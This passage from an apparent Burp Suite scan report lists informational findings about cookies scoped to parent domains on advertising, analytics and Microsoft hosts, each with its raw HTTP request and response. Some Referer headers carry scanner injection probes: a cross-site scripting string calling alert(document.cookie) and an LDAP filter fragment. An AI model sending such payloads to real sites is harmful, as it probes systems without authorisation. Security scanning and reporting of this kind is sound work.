Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=604df4063ca91afa132a73bbd94df4dd; expires=Sat, 25-Jan-2031 02:04:32 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close

16.40. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FC00=FB=AgEAYQ6guQgB; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVIHP&AP=1089 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

16.41. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=5d4473db-24.143.206.162-1293844712; expires=Mon, 28-Jan-2013 23:26:31 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?rn=1296343586482&c7=http%3A%2F%2Fwww.redacted%2F&c1=2&c2=3000001 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=5d4473db-24.143.206.162-1293844712

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 29 Jan 2011 23:26:31 GMT
Connection: close
Set-Cookie: UID=5d4473db-24.143.206.162-1293844712; expires=Mon, 28-Jan-2013 23:26:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

16.42. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 29-Jan-2013 01:19:41 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnbcom&d.x=212602874&d.t=page&d.u=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D*%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&d.r=http%3A%2F%2Fburp%2Fshow%2F3 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 30 Jan 2011 01:19:41 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 29-Jan-2013 01:19:41 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

16.43. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 29-Jan-2013 01:30:06 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p85001580&c3=58087454&c4=40401740&c5=1&c6=39&c7=wed%20jan%2026%2020%3A14%3A29%202011&c8=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN3867.270604.B3%2FB5128597.7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000730461%2Fmnum%3D0000950192%2Fcstr%3D12110217%3D_4d44bf07%2C6566708061%2C730461_950192_1183_0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D12110217%2Foptn%3D64%3Ftrg%3Dhttp%3A%2F%2Fb3.mookie1.com%2FRealMedia%2Fads%2Fclick_lx.ads%2FAOLB3%2FRadioShack%2FSELL_2011Q1%2FCPA%2F728%2FL36%2F860849269%2Fx90%2FUSNetwork%2FRS_SELL_2011Q1_AOL_CPA_728%2FRadioShack_SELL_2011Q1.html%2F72634857383030695a694d41416f6366%3F%3Bord%3D860849269%3F&c9=Advertisement&c10=http%3A%2F%2Fmsn.whitepages.com%2F&c15=&1296351004927 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; UID=1d29d89e-72.246.30.75-1294456810; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 30 Jan 2011 01:30:06 GMT
Connection: close
Set-Cookie: UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 29-Jan-2013 01:30:06 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

16.44. http://boyle.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boyle.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=9ff34bdc0b2e32fcc178bd49c46b26f9; expires=Sat, 25-Jan-2031 02:05:03 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: boyle.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=9ff34bdc0b2e32fcc178bd49c46b26f9; expires=Sat, 25-Jan-2031 02:05:03 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close

16.45. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Connection: close
Content-Length: 2204

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

16.46. http://c.redcated/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.redcated
Path:	/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redcated
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.redacted/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.redacted%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&MUID=AD04D6F8B2FF44629973BD0674351135
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;
Date: Sat, 29 Jan 2011 23:26:33 GMT
Content-Length: 0

16.47. http://c.bing.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.bing.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; domain=.bing.com; expires=Thu, 18-Aug-2011 17:11:11 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621031&D=1593447&AF=NOFORM; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.redcated/c.gif?DI=15074&RedC=c.bing.com&MXFR=F741A5D3C8544F77A0B57D8439E7E06E
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; domain=.bing.com; expires=Thu, 18-Aug-2011 17:11:11 GMT; path=/;
Date: Sun, 30 Jan 2011 17:11:10 GMT
Content-Length: 0

16.48. http://c.redacted/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.redacted
Path:	/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; domain=.redacted; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 23:26:33 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; domain=.redacted; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;
Connection: Keep-Alive
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Location: http://c.redcated/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.redacted%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135

16.49. http://c.statcounter.com/t.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0; expires=Fri, 29-Jan-2016 14:47:53 GMT; path=/; domain=.statcounter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1890207&resolution=1920&h=1200&camefrom=http%3A//news.ycombinator.com/news&u=http%3A//informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual&t=Information%20Arbitrage%20-%20Start%20Fund%3A%20No%20big%20deal.%20Business%20as%20usual.&java=1&security=9e00f8ff&sc_random=0.31911576888523996&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:47:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0; expires=Fri, 29-Jan-2016 14:47:53 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.50. http://calendar.live.com/calendar/calendar.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://calendar.live.com
Path:	/calendar/calendar.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

mktstate=S=-1659053062&U=&E=&P=&B=en; domain=.live.com; path=/
mkt1=norm=en; domain=.live.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /calendar/calendar.aspx HTTP/1.1
Host: calendar.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
xxn:23
X-AspNet-Version: 2.0.50727
x-dns-prefetch-control: off
X-UA-Compatible: IE=7
X-Content-Type-Options: nosniff
MSNSERVER: H: cal1-w23 V: 15.4.120.117 D: 2011-01-18T01:29:02
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353171&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fcalendar.live.com%2F%2Fcalendar%2Fcalendar.aspx&lc=1033&id=64362&mkt=en-us
Set-Cookie: mktstate=S=-1659053062&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=ui=en-us; domain=.calendar.live.com; path=/
Set-Cookie: mt=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: WLC=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: PSC=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: CCN=; domain=.calendar.live.com; expires=Thu, 01-Jan-1970 12:00:01 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sun, 06-Feb-2011 02:06:11 GMT; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 334

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353171&rver=6.1.6206.0&wp=MBI&wrep
...[SNIP]...

16.51. http://careers.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://careers.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=da39980442014ca6b9da39619943b989; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8EDD00D637154D4B841C122EB598FF5B; domain=.redacted; expires=Thu, 18-Aug-2011 02:06:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: careers.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 02:06:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
Set-Cookie: MC1=V=3&GUID=da39980442014ca6b9da39619943b989; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8EDD00D637154D4B841C122EB598FF5B; domain=.redacted; expires=Thu, 18-Aug-2011 02:06:11 GMT; path=/
Cache-Control: no-cache
Content-Length: 0

16.52. http://clk.redcated/APM/go/139941180/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/APM/go/139941180/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296353263-3972457; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=7E5205F6A748400B84AD01F34006AE37; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/285d4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=b882065/285d4/10e4d581/bab9/4d44c7ef; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /APM/go/139941180/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.meaningfulbeauty.com/?uci=US-MT-O-DI-MI-2906
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353263-3972457; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=7E5205F6A748400B84AD01F34006AE37; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/285d4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=b882065/285d4/10e4d581/bab9/4d44c7ef; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:43 GMT
Connection: close

16.53. http://clk.redcated/APM/go/148848786/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/APM/go/148848786/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296353265-3982025; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=5DEF820424F84B24B69D3D93ECECB25F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bce8f84/1a43a/11174245/bab9/4d44c7f1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /APM/go/148848786/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
